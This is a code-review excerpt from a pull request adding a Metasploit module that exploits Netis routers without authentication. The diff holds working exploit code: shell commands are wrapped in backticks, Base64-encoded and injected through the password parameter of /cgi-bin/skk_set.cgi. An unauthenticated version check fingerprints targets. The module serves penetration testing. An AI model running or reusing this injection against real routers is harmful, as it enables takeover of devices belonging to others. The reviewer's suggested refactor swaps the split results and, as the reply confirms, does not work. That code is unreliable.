modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb

```diff
@@ -0,0 +1,227 @@
+      }
+    })
+    return true if res && res.code == 200 && res.body.include?('SUCCESS')
+
+    false
+  end
+
+  # CVE-2024-48456: remote code execution in the parameter password at the change admin password page at
+  # the router web interface
+  # affected components: web endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/password.sh
+  def execute_command(cmd, _opts = {})
+    # store name of payload and cleanup payload file when session is established (see def on_new_session)
+    @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
+
+    # skip last command to remove payload because it does not work
+    unless cmd.include?('rm -f')
+      payload = Base64.strict_encode64("`#{cmd}`")
+      print_status("Executing #{cmd}")
+      send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'password' => payload,
+          'new_pwd_confirm' => payload,
+          'passwd_set' => 'passwd_set',
+          'mode_name' => 'skk_set',
+          'app' => 'passwd',
+          'wl_link' => 0
+        }
+      })
+    end
+  end
+
+  def on_new_session(_session)
+    # cleanup payload file
+    register_files_for_cleanup(@payload_name.to_s)
+    super
+  end
+
+  # CVE-2024-48455: information disclosure where an unauthenticated remote attacker can obtain sensitive information
+  # affected components: web endpoint /cgi-bin/skk_set.cgi via the mode_name and wl_link parameter
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),
+      'vars_post' => {
+        'mode_name' => 'skk_get',
+        'wl_link' => 0
+      }
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')
+
+    # trying to get the model and version number
+    # unfortunately JSON parsing fails for some routers, so we need to use this ugly REGEX :-(
+    version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
+    # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison
+    unless version.nil?
+      version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop
+      # The model number part is usually something like Netis(NC63)-V3.0.0.3131,
+      # but occassionally you see things like Stonet-N3D-V3.0.0.4142, or NX10-V3.0.0.4142
+      if version[2].upcase.split('-V')[0].include?('-')
+        model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')
+      elsif version[2].upcase.split('-V')[0].include?('(')
+        model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')
+      else
+        model_number = version[2].upcase.split('-V')[0]
+      end
```

Comment:
```suggestion
      version, model = version[2].upcase.split('-V')
      version_number = version.gsub(/[[:space:]]/, '').chop
      # The model number part is usually something like Netis(NC63)-V3.0.0.3131,
      # but occasionally you see things like Stonet-N3D-V3.0.0.4142, or NX10-V3.0.0.4142
      if model.include?('-')
        model_number = version[/-([^-]+)/, 1].gsub(/[[:space:]]/, '')
      elsif model.include?('(')
        model_number = version[/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')
      else
        model_number = model
      end
```

Something like this, to factorise things a bit.

Reply:
Mmm, you change did not work. Left the old code in.